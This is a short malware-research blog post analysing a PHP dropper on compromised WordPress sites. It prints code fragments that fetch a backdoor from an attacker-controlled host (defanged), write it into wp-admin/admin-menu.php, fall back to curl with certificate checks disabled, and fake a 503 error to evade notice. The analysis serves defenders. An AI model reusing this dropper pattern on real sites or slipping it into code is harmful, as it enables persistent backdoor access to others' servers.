The elegant dropper – reusable code for PHP shell installation

  • May 31, 2017
Labs Note

During our malware research role, we analyze hundreds (if not thousands) of malware samples every day. Quite often, highly-obfuscated techniques are used by attackers to avoid detection and maintain access to the compromised environment for as long as possible.

One of these techniques is called dropper, which consists of using “good code” (undetectable by scanners), to download and execute another piece of malicious code from an external resource. In this article, we’ll describe how attackers used not only that but also implemented different evasion techniques along the way.

The code begins with a few assignments:

...$shpath = $_SERVER['DOCUMENT_ROOT']."/wp-admin/admin-menu.php";$shf = FFGet("hxxp://[INFECTED.DOMAIN]/wp-booter.txt");...file_put_contents($shpath, $shf);

The first variable ($shpath) receives the path where the backdoor will be placed and the second one ($shf) downloads and stores the content of the wp-booter.txt file from a remote server (controlled by the attacker). After that, the backdoor assigned to $shf is written into $shpath through file_put_contents().

Please note the function FFGet() which basically mimics the file_get_contents() and curl_init() as a fail-safe to download the backdoor. Here is a small snippet:

    if(strlen($file_contents)<1&&function_exists('curl_init')){       try       {            $file_contents ="";            $ch = curl_init();            $timeout = 30;            curl_setopt($ch,CURLOPT_URL,$url);            curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);            curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);            curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);            curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);            curl_setopt($ch,CURLOPT_USERAGENT,$user_agent);            $file_contents = curl_exec( $ch);            curl_close( $ch );

In addition to that, if the content of $file_contents is either unavailable or nonexistent, the dropper will elegantly display a standard “HTTP 503 Apache Error”.

if($file_contents=="503"||$file_contents==""){  ob_start();  header('HTTP/1.1 503 Service Temporarily Unavailable');  header('Status:  503 Service Temporarily Unavailable');  header('Retry-After:1200');  header('X-Powered-By:Apache');  exit();}

If everything works as planned for the attacker, the file $shpath ($_SERVER[‘DOCUMENT_ROOT’].”/wp-admin/admin-menu.php”; will contain the backdoor located inside the file wp-booter.txt.

This technique (malware dropper) is often used because although the file wp-admin/admin-menu.php could be easily detected and removed, attackers would still be able to reinsert the backdoor by executing the dropper.

To detect these issues, we highly recommend having a File Integrity Monitoring System in place and clean backups of your files and database. If a compromise happens, you’d be more equipped to restore the website and prevent any damages to your online presence and SEO.

Yuliyan is Malware Researcher at Sucuri. He is always somewhere on the Internet digging for new malware and meantime helping extending the benchmarks for the PCI-DSS standard. In his free time you can find him skiing in the big mountain. Find him on Twitter @yuliyantsvetkov

Related Tags
Related Categories
You May Also Like